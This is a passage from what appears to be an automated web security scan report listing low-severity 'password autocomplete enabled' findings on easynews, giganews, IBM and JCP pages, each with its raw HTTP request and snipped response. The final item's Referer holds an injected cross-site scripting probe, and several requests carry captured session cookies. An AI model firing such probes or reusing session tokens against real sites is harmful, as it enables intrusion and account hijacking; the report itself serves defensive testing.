<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<span id="Login">
<form action="https://www.easynews.com/login/" method="post" name="login" id="login" style="padding:0px;" border="0">
<label class="Caps" for="username">
...[SNIP]...
</label><input onfocus="this.select();" class="Text" id="password" type="password" name="password" maxlength="50" />
<input class="Image" type="image" value="Log In" src="/images/Login-Button.png" />
...[SNIP]...

13.9. http://www.easynews.com/whyeasynews.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.easynews.com
Path:   /whyeasynews.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /whyeasynews.html HTTP/1.1
Host: www.easynews.com
Proxy-Connection: keep-alive
Referer: http://www.easynews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer9=4eae35f1b34eae35f1b30a654ca39c; PAPVisitorId=abd16110a066614fc7d576400r5Cr6Wx; __utmx=40324861.; __utmxx=40324861.; __utma=63532859.2035609402.1316219834.1316219834.1316219834.1; __utmb=63532859.1.10.1316219834; __utmc=63532859; __utmz=63532859.1316219834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:36:23 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Fri, 23 Sep 2011 19:36:23 GMT
Content-Type: text/html
Content-Length: 31064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<span id="Login">
<form action="https://www.easynews.com/login/" method="post" name="login" id="login" style="padding:0px;" border="0">
<label class="Caps" for="username">
...[SNIP]...
</label><input onfocus="this.select();" class="Text" id="password" type="password" name="password" maxlength="50" />
<input class="Image" type="image" value="Log In" src="/images/Login-Button.png" />
...[SNIP]...

13.10. https://www.easynews.com/signup/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.easynews.com
Path:   /signup/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /signup/?accounttype=20&linktype=trialbuttontophome HTTP/1.1
Host: www.easynews.com
Connection: keep-alive
Referer: http://www.easynews.com/?gclid=CJzUx83AoqsCFRdlgwod-2urfQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer9=4eae35f1b34eae35f1b30a654ca39c; __utmx=40324861.; __utmxx=40324861.; __utma=63532859.1552519903.1316219542.1316219542.1316219542.1; __utmb=63532859.1.10.1316219542; __utmc=63532859; __utmz=63532859.1316219542.1.1.utmgclid=CJzUx83AoqsCFRdlgwod-2urfQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server; PAPVisitorId=abd16110a066614fc7d576400r5Cr6Wx

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 16 Sep 2011 19:32:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=45, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 70627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<br />
<form name="theForm" method="post" action="/signup/index.phtml" onsubmit="return checkForm(this)">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
<td><input type="password" name="Password1" size="18" maxlength="18" value=""></td>
...[SNIP]...
<td><input type="password" name="Password2" size="18" maxlength="18" value=""></td>
...[SNIP]...

13.11. http://www.giganews.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.giganews.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?gclid=CMbM1MnAoqsCFQNggwod4mqsoA HTTP/1.1
Host: www.giganews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:15 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:31:15 GMT
Set-Cookie: engine_keywords=google%3Bnntp%20server; domain=.giganews.com; path=/
Vary: Accept-Encoding
Content-Length: 22201

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...
<div id="dropdown" class="dropdown-menu">
<form id="auth" action="https://www.giganews.com/auth/" method="post">
<div>
...[SNIP]...
</label> <input type="password" id="auth-pw" name="credential_1" size="12" /> <input type="hidden" name="destination" value="/" />
...[SNIP]...

13.12. https://www.giganews.com/signup/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /signup/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /signup/ HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Referer: http://www.giganews.com/?gclid=CMbM1MnAoqsCFQNggwod4mqsoA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:14 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:32:14 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 21662

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...
<div id="dropdown" class="dropdown-menu">
<form id="auth" action="https://www.giganews.com/auth/" method="post">
<div>
...[SNIP]...
</label> <input type="password" id="auth-pw" name="credential_1" size="12" /> <input type="hidden" name="destination" value="/" />
...[SNIP]...

13.13. https://www.giganews.com/signup/billing.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /signup/billing.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /signup/billing.html?si=1&signupkey=1316201533-53313887a-x&edit=1&account=PERS-SILVER-A HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Referer: https://www.giganews.com/signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:37:24 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:37:24 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 43234

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...
</div>

<form id="signup" method="post"
action="/signup/billing.html">


<!-- Start Account Information -->
...[SNIP]...
</label>
<input type="password" name="password" tabindex="6" maxlength="8" class="text" id="f-password" />
</div>
...[SNIP]...
</label>
<input type="password" name="conf_password" tabindex="7" maxlength="8" class="text" id="c-password" />
</div>
...[SNIP]...
</label>
<input type="password" name="credit_code" tabindex="19" class="text" id="su-cvv" />
<a tabindex="20" href="/cvv2.html" rel="external" id="cvv-info">
...[SNIP]...

13.14. http://www.ibm.com/common/js/dynamicnav.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /common/js/dynamicnav.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /common/js/dynamicnav.js HTTP/1.1
Host: www.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/perf/reports/zvm/html/imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; conxnsCookie=en

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:57 GMT
Server: IBM_HTTP_Server
Cache-Control: max-age=86400
Expires: Sat, 17 Sep 2011 19:42:57 GMT
Last-Modified: Thu, 02 Sep 2010 13:02:39 GMT
ETag: "1421b-6dc5b9c0"
Accept-Ranges: bytes
Cteonnt-Length: 82459
Content-Type: application/x-javascript
Vary: User-Agent, Accept-Encoding
Content-Length: 82459

if(typeof IOL=="undefined"||IOL==null){var IOL={}}if(typeof PMM=="undefined"||PMM==null){var PMM={}}if(typeof WEBSIGNIN=="undefined"||WEBSIGNIN==null){var WEBSIGNIN={}}var userstate;var ibmWebSigninRe
...[SNIP]...
</p>';if(B==true){A+='<form action="'+WEBSIGNIN.path.PKMS+'" id="userForm" onsubmit="ibmCommonDynamicNavLayerChk(this, \'ssoFPath\'); return false;" method="post">'
}else{A+='<form id="userForm" method="post" name="userForm" onsubmit="return false">
...[SNIP]...
</label><input type="password" value="" size="25" id="password" name="password" maxlength="31"/><input type="hidden" name="login-form-type" value="pwd" />
...[SNIP]...

13.15. http://www.ibm.com/developerworks/java/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/java/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /developerworks/java/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000O2z-Ev76yNpPHLnd4LgjbzQ:13uppre7c; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:13 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 57486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

13.16. http://www.ibm.com/developerworks/java/find/standards/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/java/find/standards/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /developerworks/java/find/standards/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/java/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000O2z-Ev76yNpPHLnd4LgjbzQ:13uppre7c; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:47 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 100994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

13.17. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/rational/library/08/0325_segal/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /developerworks/rational/library/08/0325_segal/index.html HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:56 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 90352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

13.18. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/rational/library/08/0325_segal/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /developerworks/rational/library/08/0325_segal/index.html HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:56 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 90352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
</p>
<form class="ibm-column-form" id="sFormId" action="" method="post" name="sForm" onsubmit="return false;">
<p>
...[SNIP]...
<span><input name="password" id="password" size="25" value="" class="required" type="password" onkeypress="handleEP(event,this.form);" /><br />
...[SNIP]...

13.19. http://www.ibm.com/developerworks/tivoli/library/s-csscript/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/tivoli/library/s-csscript/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /developerworks/tivoli/library/s-csscript/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?sn=mh&q=xss&lang=en&cc=us&en=utf
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:06 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 81509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

13.20. http://www.ibm.com/developerworks/tivoli/library/s-csscript/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/tivoli/library/s-csscript/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /developerworks/tivoli/library/s-csscript/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?sn=mh&q=xss&lang=en&cc=us&en=utf
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:06 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 81509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
</p>
<form class="ibm-column-form" id="sFormId" action="" method="post" name="sForm" onsubmit="return false;">
<p>
...[SNIP]...
<span><input name="password" id="password" size="25" value="" class="required" type="password" onkeypress="handleEP(event,this.form);" /><br />
...[SNIP]...

13.21. http://www.ibm.com/search/csass/search/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /search/csass/search/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/
Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--; ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:34 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Set-Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=3600, no-cache=set-cookie
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 63016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- properties.ftl--><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

13.22. http://www.jcp.org/en/home/index  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jcp.org
Path:   /en/home/index

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/home/index HTTP/1.1
Host: www.jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jcp.org/en/jsr/detail?id=2342988c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E6a2be8e6b8e
Cookie: JSESSIONID=48F45D27182FAA87A47D8633F73BD701

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 17 Sep 2011 01:54:28 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 27289


<!-- ** BEGIN: header.jsp ** //-->


